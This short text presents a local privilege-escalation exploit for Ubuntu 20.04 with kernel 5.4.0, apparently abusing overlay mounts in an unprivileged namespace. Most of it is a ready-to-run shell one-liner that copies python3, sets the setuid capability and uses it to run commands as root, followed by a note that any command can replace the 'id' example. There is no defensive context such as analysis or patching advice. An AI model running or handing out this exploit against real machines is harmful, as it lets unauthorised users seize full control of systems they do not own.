Ubuntu 20.04 with kernel 5.4.0

Exploit

unshare -rm sh -c "mkdir l u w m && cp /u*/b*/p*3 l/;
setcap cap_setuid+eip l/python3;mount -t overlay overlay -o rw,lowerdir=l,upperdir=u,workdir=w m && touch m/*;" && u/python3 -c 'import os;os.setuid(0);os.system("id")'

The expected answer is to display the 'id' command for the root user. You can exploit the vulnerability changing using de OS module for python3, following the os.system example command in the file.